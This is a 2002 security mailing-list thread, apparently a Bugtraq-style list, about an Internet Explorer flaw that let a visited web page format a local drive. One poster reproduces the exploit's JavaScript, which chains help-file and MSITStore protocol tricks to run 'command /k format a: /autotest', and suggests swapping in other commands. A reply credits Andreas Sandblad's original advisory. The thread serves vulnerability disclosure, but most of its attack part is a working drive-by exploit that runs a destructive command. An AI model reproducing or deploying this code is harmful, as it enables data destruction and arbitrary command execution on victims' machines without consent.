Re: ZDnet forum: IE formatting local drive

2002-11-17 Thread Gossi The Dog 
FYI, the HTML code is;










prog = 'command';
args = '/k format   a: /autotest';

if (!location.hash) {
  showHelp(location+"#1");
  showHelp("iexplore.chm");
  blur();
}
else if (location.hash == "#1")
  open(location+"2").blur();
else {
  f = opener.location.assign;
  opener.location="res:";
  f("javascript:location.replace('mk:@MSITStore:C:')");
  setTimeout('run()',1000);
}
function run() {
  f("javascript:document.write('')");
  f("javascript:c1.Click();c2.Click();c3.Click();");
  close();
}


Testing IE Execute Exploit



---

Change 'args' to a different command (/autotest doesn't work well on
Windows 2000, for example).


Oh dear.

Gossi









RE: ZDnet forum: IE formatting local drive




2002-11-16

Thread
Thor Larholm



This is just a copy of Andreas Sandblads advisory, with a new command :)

Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC

Strike Now, StrikeFirst!
http://www.pivx.com/sf.html

-Original Message-
From: Alan Rouse [mailto:[EMAIL PROTECTED]]
Sent: 11. november 2002 17:22
To: [EMAIL PROTECTED]
Subject: ZDnet forum: IE formatting local drive


Format a local drive by visiting a URL from a fully patched Windows / IE
platform.  This appeared last night:  
 
http://forums.zdnet.com/group/zd.Security.Virus.Alerts/community/communi
ty.tpt/@thread@33885@F@1@D-,D@ALL/@article@mark@33885?EXP=ALL&VWM=&ROS=&
OC=75